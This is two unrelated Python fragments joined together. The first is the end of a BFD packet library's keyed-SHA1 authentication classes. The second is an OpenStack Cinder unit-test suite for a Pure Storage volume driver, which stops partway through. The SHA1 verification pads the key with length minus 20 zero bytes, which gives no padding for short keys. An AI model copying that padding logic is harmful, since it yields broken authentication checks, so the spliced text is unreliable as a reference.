This method can be invoked only when ``self.auth_hash`` is defined.
Returns a boolean indicates whether the hash can be authenticated
by the correspondent Auth Key or not.
``prev`` is a ``bfd`` instance for the BFD Control header which this
authentication section belongs to. It's necessary to be assigned
because an SHA1 hash must be calculated over the entire BFD Control
packet.
``auth_keys`` is a dictionary of authentication key chain which
key is an integer of *Auth Key ID* and value is a string of *Auth Key*.
"""
auth_keys = auth_keys if auth_keys else {}
assert isinstance(prev, bfd)
if self.auth_hash is None:
return False
if self.auth_key_id not in auth_keys:
return False
auth_key = auth_keys[self.auth_key_id]
bfd_bin = prev.pack()
auth_hdr_bin = self.serialize_hdr()
auth_data_bin = struct.pack(self._PACK_STR, self.auth_key_id, 0,
self.seq, auth_key +
(b'\x00' * (len(auth_key) - 20)))
h = hashlib.sha1()
h.update(bfd_bin + auth_hdr_bin + auth_data_bin)
if self.auth_hash == h.digest():
return True
else:
return False
@bfd.register_auth_type(BFD_AUTH_METICULOUS_KEYED_SHA1)
class MeticulousKeyedSHA1(KeyedSHA1):
""" BFD (RFC 5880) Meticulous Keyed SHA1 Authentication Section class
All methods of this class are inherited from ``KeyedSHA1``.
An instance has the following attributes.
Most of them are same to the on-wire counterparts but in host byte order.
.. tabularcolumns:: |l|L|
=========== ================================================
Attribute Description
=========== ================================================
auth_type (Fixed) The authentication type in use.
auth_key_id The authentication Key ID in use.
seq The sequence number for this packet.
This value is incremented for each
successive packet transmitted for a session.
auth_key The shared SHA1 key for this packet.
auth_hash (Optional) The 20-byte SHA1 hash for the packet.
auth_len (Fixed) The length of the authentication section
is 28 bytes.
=========== ================================================
"""
pass
bfd.set_classes(bfd._auth_parsers)
|
|
# Copyright (c) 2014 Pure Storage, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from copy import deepcopy
import sys
import mock
from oslo_utils import units
from cinder import exception
from cinder import test
def fake_retry(exceptions, interval=1, retries=3, backoff_rate=2):
def _decorator(f):
return f
return _decorator
patch_retry = mock.patch('cinder.utils.retry', fake_retry)
patch_retry.start()
sys.modules['purestorage'] = mock.Mock()
from cinder.volume.drivers import pure
# Only mock utils.retry for cinder.volume.drivers.pure import
patch_retry.stop()
DRIVER_PATH = "cinder.volume.drivers.pure"
BASE_DRIVER_OBJ = DRIVER_PATH + ".PureBaseVolumeDriver"
ISCSI_DRIVER_OBJ = DRIVER_PATH + ".PureISCSIDriver"
FC_DRIVER_OBJ = DRIVER_PATH + ".PureFCDriver"
ARRAY_OBJ = DRIVER_PATH + ".FlashArray"
TARGET = "pure-target"
API_TOKEN = "12345678-abcd-1234-abcd-1234567890ab"
VOLUME_BACKEND_NAME = "Pure_iSCSI"
ISCSI_PORT_NAMES = ["ct0.eth2", "ct0.eth3", "ct1.eth2", "ct1.eth3"]
FC_PORT_NAMES = ["ct0.fc2", "ct0.fc3", "ct1.fc2", "ct1.fc3"]
ISCSI_IPS = ["10.0.0." + str(i + 1) for i in range(len(ISCSI_PORT_NAMES))]
FC_WWNS = ["21000024ff59fe9" + str(i + 1) for i in range(len(FC_PORT_NAMES))]
HOSTNAME = "computenode1"
PURE_HOST_NAME = pure.PureBaseVolumeDriver._generate_purity_host_name(HOSTNAME)
PURE_HOST = {
"name": PURE_HOST_NAME,
"hgroup": None,
"iqn": [],
"wwn": [],
}
REST_VERSION = "1.2"
VOLUME_ID = "abcdabcd-1234-abcd-1234-abcdeffedcba"
VOLUME = {
"name": "volume-" + VOLUME_ID,
"id": VOLUME_ID,
"display_name": "fake_volume",
"size": 2,
"host": "irrelevant",
"volume_type": None,
"volume_type_id": None,
"consistencygroup_id": None,
}
VOLUME_WITH_CGROUP = VOLUME.copy()
VOLUME_WITH_CGROUP['consistencygroup_id'] = \
"4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
SRC_VOL_ID = "dc7a294d-5964-4379-a15f-ce5554734efc"
SRC_VOL = {
"name": "volume-" + SRC_VOL_ID,
"id": SRC_VOL_ID,
"display_name": 'fake_src',
"size": 2,
"host": "irrelevant",
"volume_type": None,
"volume_type_id": None,
"consistencygroup_id": None,
}
SNAPSHOT_ID = "04fe2f9a-d0c4-4564-a30d-693cc3657b47"
SNAPSHOT = {
"name": "snapshot-" + SNAPSHOT_ID,
"id": SNAPSHOT_ID,
"volume_id": SRC_VOL_ID,
"volume_name": "volume-" + SRC_VOL_ID,
"volume_size": 2,
"display_name": "fake_snapshot",
"cgsnapshot_id": None,
}
SNAPSHOT_WITH_CGROUP = SNAPSHOT.copy()
SNAPSHOT_WITH_CGROUP['cgsnapshot_id'] = \
"4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
INITIATOR_IQN = "iqn.1993-08.org.debian:01:222"
INITIATOR_WWN = "5001500150015081"
ISCSI_CONNECTOR = {"initiator": INITIATOR_IQN, "host": HOSTNAME}
FC_CONNECTOR = {"wwpns": {INITIATOR_WWN}, "host": HOSTNAME}
TARGET_IQN = "iqn.2010-06.com.purestorage:flasharray.12345abc"
TARGET_WWN = "21000024ff59fe94"
TARGET_PORT = "3260"
INITIATOR_TARGET_MAP =\
{
'5001500150015081': ['21000024ff59fe93',
'21000024ff59fe92',
'21000024ff59fe91',
'21000024ff59fe94'],
}
DEVICE_MAPPING =\
{
"fabric": {'initiator_port_wwn_list': {INITIATOR_WWN},
'target_port_wwn_list': FC_WWNS
},
}
ISCSI_PORTS = [{"name": name,
"iqn": TARGET_IQN,
"portal": ip + ":" + TARGET_PORT,
"wwn": None,
} for name, ip in zip(ISCSI_PORT_NAMES, ISCSI_IPS)]
FC_PORTS = [{"name": name,
"iqn": None,
"portal": None,
"wwn": wwn,
} for name, wwn in zip(FC_PORT_NAMES, FC_WWNS)]
NON_ISCSI_PORT = {
"name": "ct0.fc1",
"iqn": None,
"portal": None,
"wwn": "5001500150015081",
}
PORTS_WITH = ISCSI_PORTS + [NON_ISCSI_PORT]
PORTS_WITHOUT = [NON_ISCSI_PORT]
VOLUME_CONNECTIONS = [
{"host": "h1", "name": VOLUME["name"] + "-cinder"},
{"host": "h2", "name": VOLUME["name"] + "-cinder"},
]
TOTAL_CAPACITY = 50.0
USED_SPACE = 32.1
PROVISIONED_CAPACITY = 70.0
DEFAULT_OVER_SUBSCRIPTION = 20
SPACE_INFO = {
"capacity": TOTAL_CAPACITY * units.Gi,
"total": USED_SPACE * units.Gi,
}
SPACE_INFO_EMPTY = {
"capacity": TOTAL_CAPACITY * units.Gi,
"total": 0,
}
ISCSI_CONNECTION_INFO = {
"driver_volume_type": "iscsi",
"data": {
"target_discovered": False,
"access_mode": "rw",
"discard": True,
"target_luns": [1, 1, 1, 1],
"target_iqns": [TARGET_IQN, TARGET_IQN, TARGET_IQN, TARGET_IQN],
"target_portals": [ISCSI_IPS[0] + ":" + TARGET_PORT,
ISCSI_IPS[1] + ":" + TARGET_PORT,
ISCSI_IPS[2] + ":" + TARGET_PORT,
ISCSI_IPS[3] + ":" + TARGET_PORT],
},
}
FC_CONNECTION_INFO = {
"driver_volume_type": "fibre_channel",
"data": {
"target_wwn": FC_WWNS,
"target_lun": 1,
"target_discovered": True,
"access_mode": "rw",
"initiator_target_map": INITIATOR_TARGET_MAP,
"discard": True,
},
}
class FakePureStorageHTTPError(Exception):
def __init__(self, target=None, rest_version=None, code=None,
headers=None, text=None):
self.target = target
self.rest_version = rest_version
self.code = code
self.headers = headers
self.text = text
class PureDriverTestCase(test.TestCase):
def setUp(self):
super(PureDriverTestCase, self).setUp()
self.mock_config = mock.Mock()
self.mock_config.san_ip = TARGET
self.mock_config.pure_api_token = API_TOKEN
self.mock_config.volume_backend_name = VOLUME_BACKEND_NAME
self.array = mock.Mock()
self.purestorage_module = pure.purestorage
self.purestorage_module.PureHTTPError = FakePureStorageHTTPError
def assert_error_propagates(self, mocks, func, *args, **kwargs):
"""Assert that errors from mocks propagate to func.
Fail if exceptions raised by mocks are not seen when calling
func(*args, **kwargs). Ensure that we are really seeing exceptions
from the mocks by failing if just running func(*args, **kargs) raises
an exception itself.
"""
func(*args, **kwargs)
for mock_func in mocks:
original_side_effect = mock_func.side_effect
mock_func.side_effect = [exception.PureDriverException(
reason='reason')]
self.assertRaises(exception.PureDriverException,
func, *args, **kwargs)
mock_func.side_effect = original_side_effect
class PureBaseVolumeDriverTestCase(PureDriverTestCase):
class fake_pure_base_volume_driver(pure.PureBaseVolumeDriver):
def initialize_connection():
pass
def setUp(self):
super(PureBaseVolumeDriverTestCase, self).setUp()
self.driver = self.fake_pure_base_volume_driver(
configuration=self.mock_config)
self.driver._array = self.array
def test_generate_purity_host_name(self):
result = self.driver._generate_purity_host_name(
"really-long-string-thats-a-bit-too-long")
self.assertTrue(result.startswith("really-long-string-that-"))
self.assertTrue(result.endswith("-cinder"))
self.assertEqual(63, len(result))
self.assertTrue(pure.GENERATED_NAME.match(result))
result = self.driver._generate_purity_host_name("!@#$%^-invalid&*")
self.assertTrue(result.startswith("invalid---"))
self.assertTrue(result.endswith("-cinder"))
self.assertEqual(49, len(result))
self.assertTrue(pure.GENERATED_NAME.match(result))
def test_create_volume(self):
self.driver.create_volume(VOLUME)
self.array.create_volume.assert_called_with(
VOLUME["name"] + "-cinder", 2 * units.Gi)
self.assert_error_propagates([self.array.create_volume],
self.driver.create_volume, VOLUME)
@mock.patch(BASE_DRIVER_OBJ + "._add_volume_to_consistency_group",
autospec=True)
def test_create_volume_with_cgroup(self, mock_add_to_cgroup):
vol_name = VOLUME_WITH_CGROUP["name"] + "-cinder"
self.driver.create_volume(VOLUME_WITH_CGROUP)
mock_add_to_cgroup\
.assert_called_with(self.driver,
VOLUME_WITH_CGROUP['consistencygroup_id'],
vol_name)
def test_create_volume_from_snapshot(self):
vol_name = VOLUME["name"] + "-cinder"
snap_name = SNAPSHOT["volume_name"] + "-cinder." + SNAPSHOT["name"]
# Branch where extend unneeded
self.driver.create_volume_from_snapshot(VOLUME, SNAPSHOT)
self.array.copy_volume.assert_called_with(snap_name, vol_name)
self.assertFalse(self.array.extend_volume.called)
self.assert_error_propagates(
[self.array.copy_volume],
self.driver.create_volume_from_snapshot, VOLUME, SNAPSHOT)
self.assertFalse(self.array.extend_volume.called)
# Branch where extend needed
SNAPSHOT["volume_size"] = 1 # resize so smaller than VOLUME
self.driver.create_volume_from_snapshot(VOLUME, SNAPSHOT)
expected = [mock.call.copy_volume(snap_name, vol_name),
mock.call.extend_volume(vol_name, 2 * units.Gi)]
self.array.assert_has_calls(expected)
self.assert_error_propagates(
[self.array.copy_volume, self.array.extend_volume],
self.driver.create_volume_from_snapshot, VOLUME, SNAPSHOT)
SNAPSHOT["volume_size"] = 2 # reset size
@mock.patch(BASE_DRIVER_OBJ + "._add_volume_to_consistency_group",
autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._extend_if_needed", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_pgroup_vol_snap_name",
spec=pure.PureBaseVolumeDriver._get_pgroup_vol_snap_name)
def test_create_volume_from_cgsnapshot(self, mock_get_snap_name,
mock_extend_if_needed,
mock_add_to_cgroup):
vol_name = VOLUME_WITH_CGROUP["name"] + "-cinder"
snap_name = "consisgroup-4a2f7e3a-312a-40c5-96a8-536b8a0f" \
"e074-cinder.4a2f7e3a-312a-40c5-96a8-536b8a0fe075."\
+ vol_name
mock_get_snap_name.return_value = snap_name
self.driver.create_volume_from_snapshot(VOLUME_WITH_CGROUP,
SNAPSHOT_WITH_CGROUP)
self.array.copy_volume.assert_called_with(snap_name, vol_name)
self.assertTrue(mock_get_snap_name.called)
self.assertTrue(mock_extend_if_needed.called)
self.driver.create_volume_from_snapshot(VOLUME_WITH_CGROUP,
SNAPSHOT_WITH_CGROUP)
mock_add_to_cgroup\
.assert_called_with(self.driver,
VOLUME_WITH_CGROUP['consistencygroup_id'],
vol_name)
def test_create_cloned_volume(self):
vol_name = VOLUME["name"] + "-cinder"
src_name = SRC_VOL["name"] + "-cinder"
# Branch where extend unneeded
self.driver.create_cloned_volume(VOLUME, SRC_VOL)
self.array.copy_volume.assert_called_with(src_name, vol_name)
self.assertFalse(self.array.extend_volume.called)
self.assert_error_propagates(
[self.array.copy_volume],
self.driver.create_cloned_volume, VOLUME, SRC_VOL)
self.assertFalse(self.array.extend_volume.called)
# Branch where extend needed
SRC_VOL["size"] = 1 # resize so smaller than VOLUME
self.driver.create_cloned_volume(VOLUME, SRC_VOL)
expected = [mock.call.copy_volume(src_name, vol_name),
mock.call.extend_volume(vol_name, 2 * units.Gi)]
self.array.assert_has_calls(expected)
self.assert_error_propagates(
[self.array.copy_volume, self.array.extend_volume],
self.driver.create_cloned_volume, VOLUME, SRC_VOL)
SRC_VOL["size"] = 2 # reset size
@mock.patch(BASE_DRIVER_OBJ + "._add_volume_to_consistency_group",
autospec=True)
def test_create_cloned_volume_with_cgroup(self, mock_add_to_cgroup):
vol_name = VOLUME_WITH_CGROUP["name"] + "-cinder"
self.driver.create_cloned_volume(VOLUME_WITH_CGROUP, SRC_VOL)
mock_add_to_cgroup\
.assert_called_with(self.driver,
VOLUME_WITH_CGROUP['consistencygroup_id'],
vol_name)
def test_delete_volume_already_deleted(self):
self.array.list_volume_private_connections.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Volume does not exist"
)
self.driver.delete_volume(VOLUME)
self.assertFalse(self.array.destroy_volume.called)
# Testing case where array.destroy_volume returns an exception
# because volume has already been deleted
self.array.list_volume_private_connections.side_effect = None
self.array.list_volume_private_connections.return_value = {}
self.array.destroy_volume.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Volume does not exist"
)
self.driver.delete_volume(VOLUME)
self.assertTrue(self.array.destroy_volume.called)
def test_delete_volume(self):
vol_name = VOLUME["name"] + "-cinder"
self.array.list_volume_private_connections.return_value = {}
self.driver.delete_volume(VOLUME)
expected = [mock.call.destroy_volume(vol_name)]
self.array.assert_has_calls(expected)
self.array.destroy_volume.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="reason")
self.driver.delete_snapshot(SNAPSHOT)
self.array.destroy_volume.side_effect = None
self.assert_error_propagates([self.array.destroy_volume],
self.driver.delete_volume, VOLUME)
def test_delete_connected_volume(self):
vol_name = VOLUME["name"] + "-cinder"
host_name_a = "ha"
host_name_b = "hb"
self.array.list_volume_private_connections.return_value = [{
"host": host_name_a,
"lun": 7,
"name": vol_name,
"size": 3221225472,
}, {
"host": host_name_b,
"lun": 2,
"name": vol_name,
"size": 3221225472,
}]
self.driver.delete_volume(VOLUME)
expected = [mock.call.list_volume_private_connections(vol_name),
mock.call.disconnect_host(host_name_a, vol_name),
mock.call.disconnect_host(host_name_b, vol_name),
mock.call.destroy_volume(vol_name)]
self.array.assert_has_calls(expected)
def test_create_snapshot(self):
vol_name = SRC_VOL["name"] + "-cinder"
self.driver.create_snapshot(SNAPSHOT)
self.array.create_snapshot.assert_called_with(
vol_name,
suffix=SNAPSHOT["name"]
)
self.assert_error_propagates([self.array.create_snapshot],
self.driver.create_snapshot, SNAPSHOT)
def test_delete_snapshot(self):
snap_name = SNAPSHOT["volume_name"] + "-cinder." + SNAPSHOT["name"]
self.driver.delete_snapshot(SNAPSHOT)
expected = [mock.call.destroy_volume(snap_name)]
self.array.assert_has_calls(expected)
self.array.destroy_volume.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="reason")
self.driver.delete_snapshot(SNAPSHOT)
self.array.destroy_volume.side_effect = None
self.assert_error_propagates([self.array.destroy_volume],
self.driver.delete_snapshot, SNAPSHOT)
@mock.patch(BASE_DRIVER_OBJ + "._get_host", autospec=True)
def test_terminate_connection(self, mock_host):
vol_name = VOLUME["name"] + "-cinder"
mock_host.return_value = {"name": "some-host"}
# Branch with manually created host
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with("some-host", vol_name)
self.assertFalse(self.array.list_host_connections.called)
self.assertFalse(self.array.delete_host.called)
# Branch with host added to host group
self.array.reset_mock()
self.array.list_host_connections.return_value = []
mock_host.return_value = PURE_HOST.copy()
mock_host.return_value.update(hgroup="some-group")
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.assertTrue(self.array.list_host_connections.called)
self.assertTrue(self.array.delete_host.called)
# Branch with host still having connected volumes
self.array.reset_mock()
self.array.list_host_connections.return_value = [
{"lun": 2, "name": PURE_HOST_NAME, "vol": "some-vol"}]
mock_host.return_value = PURE_HOST
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.assertFalse(self.array.delete_host.called)
# Branch where host gets deleted
self.array.reset_mock()
self.array.list_host_connections.return_value = []
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.array.delete_host.assert_called_with(PURE_HOST_NAME)
# Branch where connection is missing and the host is still deleted
self.array.reset_mock()
self.array.disconnect_host.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="reason")
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.array.delete_host.assert_called_with(PURE_HOST_NAME)
# Branch where an unexpected exception occurs
self.array.reset_mock()
self.array.disconnect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=500,
text="Some other error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.terminate_connection,
VOLUME,
ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.assertFalse(self.array.list_host_connections.called)
self.assertFalse(self.array.delete_host.called)
@mock.patch(BASE_DRIVER_OBJ + "._get_host", autospec=True)
def test_terminate_connection_host_deleted(self, mock_host):
vol_name = VOLUME["name"] + "-cinder"
mock_host.return_value = PURE_HOST.copy()
self.array.reset_mock()
self.array.list_host_connections.return_value = []
self.array.delete_host.side_effect = \
self.purestorage_module.PureHTTPError(code=400,
text='Host does not exist.')
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.array.delete_host.assert_called_once_with(PURE_HOST_NAME)
@mock.patch(BASE_DRIVER_OBJ + ".get_filter_function", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_provisioned_space", autospec=True)
def test_get_volume_stats(self, mock_space, mock_filter):
filter_function = "capabilities.total_volumes < 10"
mock_space.return_value = (PROVISIONED_CAPACITY * units.Gi, 100)
mock_filter.return_value = filter_function
self.assertEqual({}, self.driver.get_volume_stats())
self.array.get.return_value = SPACE_INFO
result = {
"volume_backend_name": VOLUME_BACKEND_NAME,
"vendor_name": "Pure Storage",
"driver_version": self.driver.VERSION,
"storage_protocol": None,
"total_capacity_gb": TOTAL_CAPACITY,
"free_capacity_gb": TOTAL_CAPACITY - USED_SPACE,
"reserved_percentage": 0,
"consistencygroup_support": True,
"thin_provisioning_support": True,
"provisioned_capacity": PROVISIONED_CAPACITY,
"max_over_subscription_ratio": (PROVISIONED_CAPACITY /
USED_SPACE),
"total_volumes": 100,
"filter_function": filter_function,
}
real_result = self.driver.get_volume_stats(refresh=True)
self.assertDictMatch(result, real_result)
self.assertDictMatch(result, self.driver._stats)
@mock.patch(BASE_DRIVER_OBJ + ".get_filter_function", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_provisioned_space", autospec=True)
def test_get_volume_stats_empty_array(self, mock_space, mock_filter):
filter_function = "capabilities.total_volumes < 10"
mock_space.return_value = (PROVISIONED_CAPACITY * units.Gi, 100)
mock_filter.return_value = filter_function
self.assertEqual({}, self.driver.get_volume_stats())
self.array.get.return_value = SPACE_INFO_EMPTY
result = {
"volume_backend_name": VOLUME_BACKEND_NAME,
"vendor_name": "Pure Storage",
"driver_version": self.driver.VERSION,
"storage_protocol": None,
"total_capacity_gb": TOTAL_CAPACITY,
"free_capacity_gb": TOTAL_CAPACITY,
"reserved_percentage": 0,
"consistencygroup_support": True,
"thin_provisioning_support": True,
"provisioned_capacity": PROVISIONED_CAPACITY,
"max_over_subscription_ratio": DEFAULT_OVER_SUBSCRIPTION,
"total_volumes": 100,
"filter_function": filter_function,
}
real_result = self.driver.get_volume_stats(refresh=True)
self.assertDictMatch(result, real_result)
self.assertDictMatch(result, self.driver._stats)
@mock.patch(BASE_DRIVER_OBJ + ".get_filter_function", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_provisioned_space", autospec=True)
def test_get_volume_stats_nothing_provisioned(self, mock_space,
mock_filter):
filter_function = "capabilities.total_volumes < 10"
mock_space.return_value = (0, 0)
mock_filter.return_value = filter_function
self.assertEqual({}, self.driver.get_volume_stats())
self.array.get.return_value = SPACE_INFO
result = {
"volume_backend_name": VOLUME_BACKEND_NAME,
"vendor_name": "Pure Storage",
"driver_version": self.driver.VERSION,
"storage_protocol": None,
"total_capacity_gb": TOTAL_CAPACITY,
"free_capacity_gb": TOTAL_CAPACITY - USED_SPACE,
"reserved_percentage": 0,
"consistencygroup_support": True,
"thin_provisioning_support": True,
"provisioned_capacity": 0,
"max_over_subscription_ratio": DEFAULT_OVER_SUBSCRIPTION,
"total_volumes": 0,
"filter_function": filter_function,
}
real_result = self.driver.get_volume_stats(refresh=True)
self.assertDictMatch(result, real_result)
self.assertDictMatch(result, self.driver._stats)
def test_extend_volume(self):
vol_name = VOLUME["name"] + "-cinder"
self.driver.extend_volume(VOLUME, 3)
self.array.extend_volume.assert_called_with(vol_name, 3 * units.Gi)
self.assert_error_propagates([self.array.extend_volume],
self.driver.extend_volume, VOLUME, 3)
def test_get_pgroup_name_from_id(self):
id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
expected_name = "consisgroup-%s-cinder" % id
actual_name = self.driver._get_pgroup_name_from_id(id)
self.assertEqual(expected_name, actual_name)
def test_get_pgroup_snap_suffix(self):
cgsnap = mock.Mock()
cgsnap.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
expected_suffix = "cgsnapshot-%s-cinder" % cgsnap.id
actual_suffix = self.driver._get_pgroup_snap_suffix(cgsnap)
self.assertEqual(expected_suffix, actual_suffix)
def test_get_pgroup_snap_name(self):
cg_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
cgsnap_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_cgsnap = mock.Mock()
mock_cgsnap.consistencygroup_id = cg_id
mock_cgsnap.id = cgsnap_id
expected_name = "consisgroup-%(cg)s-cinder.cgsnapshot-%(snap)s-cinder"\
% {"cg": cg_id, "snap": cgsnap_id}
actual_name = self.driver._get_pgroup_snap_name(mock_cgsnap)
self.assertEqual(expected_name, actual_name)
def test_get_pgroup_vol_snap_name(self):
cg_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
cgsnap_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
volume_name = "volume-4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_snap = mock.Mock()
mock_snap.cgsnapshot = mock.Mock()
mock_snap.cgsnapshot.consistencygroup_id = cg_id
mock_snap.cgsnapshot.id = cgsnap_id
mock_snap.volume_name = volume_name
expected_name = "consisgroup-%(cg)s-cinder.cgsnapshot-%(snap)s-cinder"\
".%(vol)s-cinder" % {
"cg": cg_id,
"snap": cgsnap_id,
"vol": volume_name,
}
actual_name = self.driver._get_pgroup_vol_snap_name(mock_snap)
self.assertEqual(expected_name, actual_name)
def test_create_consistencygroup(self):
mock_cgroup = mock.Mock()
mock_cgroup.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
model_update = self.driver.create_consistencygroup(None, mock_cgroup)
expected_name = self.driver._get_pgroup_name_from_id(mock_cgroup.id)
self.array.create_pgroup.assert_called_with(expected_name)
self.assertEqual({'status': 'available'}, model_update)
self.assert_error_propagates(
[self.array.create_pgroup],
self.driver.create_consistencygroup, None, mock_cgroup)
@mock.patch(BASE_DRIVER_OBJ + ".create_volume_from_snapshot")
@mock.patch(BASE_DRIVER_OBJ + ".create_consistencygroup")
def test_create_consistencygroup_from_src(self, mock_create_cg,
mock_create_vol):
mock_context = mock.Mock()
mock_group = mock.Mock()
mock_cgsnapshot = mock.Mock()
mock_snapshots = [mock.Mock() for i in range(5)]
mock_volumes = [mock.Mock() for i in range(5)]
self.driver.create_consistencygroup_from_src(
mock_context,
mock_group,
mock_volumes,
cgsnapshot=mock_cgsnapshot,
snapshots=mock_snapshots,
source_cg=None,
source_vols=None
)
mock_create_cg.assert_called_with(mock_context, mock_group)
expected_calls = [mock.call(vol, snap)
for vol, snap in zip(mock_volumes, mock_snapshots)]
mock_create_vol.assert_has_calls(expected_calls,
any_order=True)
self.assert_error_propagates(
[mock_create_vol, mock_create_cg],
self.driver.create_consistencygroup_from_src,
mock_context,
mock_group,
mock_volumes,
cgsnapshot=mock_cgsnapshot,
snapshots=mock_snapshots,
source_cg=None,
source_vols=None
)
def test_create_consistencygroup_from_src_no_snap(self):
# Expect an error when no cgsnapshot or snapshots are provided
self.assertRaises(exception.InvalidInput,
self.driver.create_consistencygroup_from_src,
mock.Mock(), # context
mock.Mock(), # group
[mock.Mock()]) # volumes
@mock.patch(BASE_DRIVER_OBJ + ".delete_volume", autospec=True)
def test_delete_consistencygroup(self, mock_delete_volume):
mock_cgroup = mock.MagicMock()
mock_cgroup.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
mock_cgroup['status'] = "deleted"
mock_context = mock.Mock()
self.driver.db = mock.Mock()
mock_volume = mock.MagicMock()
expected_volumes = [mock_volume]
self.driver.db.volume_get_all_by_group.return_value = expected_volumes
model_update, volumes = \
self.driver.delete_consistencygroup(mock_context, mock_cgroup)
expected_name = self.driver._get_pgroup_name_from_id(mock_cgroup.id)
self.array.destroy_pgroup.assert_called_with(expected_name)
self.assertEqual(expected_volumes, volumes)
self.assertEqual(mock_cgroup['status'], model_update['status'])
mock_delete_volume.assert_called_with(self.driver, mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group has been destroyed."
)
self.driver.delete_consistencygroup(mock_context, mock_cgroup)
self.array.destroy_pgroup.assert_called_with(expected_name)
mock_delete_volume.assert_called_with(self.driver, mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group does not exist"
)
self.driver.delete_consistencygroup(mock_context, mock_cgroup)
self.array.destroy_pgroup.assert_called_with(expected_name)
mock_delete_volume.assert_called_with(self.driver, mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Some other error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_consistencygroup,
mock_context,
mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=500,
text="Another different error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_consistencygroup,
mock_context,
mock_volume)
self.array.destroy_pgroup.side_effect = None
self.assert_error_propagates(
[self.array.destroy_pgroup],
self.driver.delete_consistencygroup, mock_context, mock_cgroup)
def _create_mock_cg(self):
mock_group = mock.MagicMock()
mock_group.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
mock_group.status = "Available"
mock_group.cg_name = "consisgroup-" + mock_group.id + "-cinder"
return mock_group
def test_update_consistencygroup(self):
mock_group = self._create_mock_cg()
add_vols = [
{'name': 'vol1'},
{'name': 'vol2'},
{'name': 'vol3'},
]
expected_addvollist = [vol['name'] + '-cinder' for vol in add_vols]
remove_vols = [
{'name': 'vol4'},
{'name': 'vol5'},
]
expected_remvollist = [vol['name'] + '-cinder' for vol in remove_vols]
self.driver.update_consistencygroup(mock.Mock(), mock_group,
add_vols, remove_vols)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=expected_addvollist,
remvollist=expected_remvollist
)
def test_update_consistencygroup_no_add_vols(self):
mock_group = self._create_mock_cg()
expected_addvollist = []
remove_vols = [
{'name': 'vol4'},
{'name': 'vol5'},
]
expected_remvollist = [vol['name'] + '-cinder' for vol in remove_vols]
self.driver.update_consistencygroup(mock.Mock(), mock_group,
None, remove_vols)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=expected_addvollist,
remvollist=expected_remvollist
)
def test_update_consistencygroup_no_remove_vols(self):
mock_group = self._create_mock_cg()
add_vols = [
{'name': 'vol1'},
{'name': 'vol2'},
{'name': 'vol3'},
]
expected_addvollist = [vol['name'] + '-cinder' for vol in add_vols]
expected_remvollist = []
self.driver.update_consistencygroup(mock.Mock(), mock_group,
add_vols, None)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=expected_addvollist,
remvollist=expected_remvollist
)
def test_update_consistencygroup_no_vols(self):
mock_group = self._create_mock_cg()
self.driver.update_consistencygroup(mock.Mock(), mock_group,
None, None)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=[],
remvollist=[]
)
@mock.patch('cinder.objects.snapshot.SnapshotList.get_all_for_cgsnapshot')
